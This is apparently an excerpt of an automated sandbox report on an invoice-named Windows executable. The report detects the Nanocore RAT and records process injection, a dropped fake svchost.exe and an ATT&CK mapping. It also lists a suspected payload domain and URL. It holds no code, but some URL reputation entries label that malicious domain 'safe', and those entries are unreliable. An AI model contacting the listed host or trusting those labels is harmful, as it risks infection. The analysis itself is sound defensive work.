Source: powershell.exe, 00000008.00000002.941411277.00000000038A0000.00000002.00000001.sdmp, explorer.exe, 00000015.00000002.923914274.0000000001640000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.924544232.0000000001600000.00000002.00000001.sdmp, explorer.exe, 00000019.00000002.921372618.0000000000BF0000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.934096881.0000000001A90000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: powershell.exe, 00000008.00000002.941411277.00000000038A0000.00000002.00000001.sdmp, explorer.exe, 00000015.00000002.923914274.0000000001640000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.924544232.0000000001600000.00000002.00000001.sdmp, explorer.exe, 00000019.00000002.921372618.0000000000BF0000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.934096881.0000000001A90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: powershell.exe, 00000008.00000002.941411277.00000000038A0000.00000002.00000001.sdmp, explorer.exe, 00000015.00000002.923914274.0000000001640000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.924544232.0000000001600000.00000002.00000001.sdmp, explorer.exe, 00000019.00000002.921372618.0000000000BF0000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.934096881.0000000001A90000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: powershell.exe, 00000008.00000002.941411277.00000000038A0000.00000002.00000001.sdmp, explorer.exe, 00000015.00000002.923914274.0000000001640000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.924544232.0000000001600000.00000002.00000001.sdmp, explorer.exe, 00000019.00000002.921372618.0000000000BF0000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.934096881.0000000001A90000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe VolumeInformation
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164, type: MEMORY
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3da9c08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3d76de8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3da9c08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3d76de8.5.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: svchost.exe, 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164, type: MEMORY
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3da9c08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3d76de8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3da9c08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3d76de8.5.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Exploitation for Privilege Escalation1	Disable or Modify Tools11	OS Credential Dumping	File and Directory Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Windows Service1	Application Shimming1	Deobfuscate/Decode Files or Information1	LSASS Memory	System Information Discovery13	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Service Execution2	Registry Run Keys / Startup Folder11	Access Token Manipulation1	Obfuscated Files or Information3	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Windows Service1	Software Packing1	NTDS	Security Software Discovery211	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection112	Timestomp1	LSA Secrets	Virtualization/Sandbox Evasion23	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Registry Run Keys / Startup Folder11	Masquerading221	Cached Domain Credentials	Process Discovery3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion23	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection112	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CN-Invoice-XXXXX9808-19011143287989.exe	28%	Virustotal		Browse
CN-Invoice-XXXXX9808-19011143287989.exe	30%	ReversingLabs	ByteCode-MSIL.Downloader.BaseLoader
CN-Invoice-XXXXX9808-19011143287989.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	0%	ReversingLabs
C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	30%	ReversingLabs	ByteCode-MSIL.Downloader.BaseLoader

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
coroloboxorozor.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://coroloboxorozor.com/base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html	0%	Avira URL Cloud	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://coroloboxorozor.com	0%	Virustotal		Browse
http://coroloboxorozor.com	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
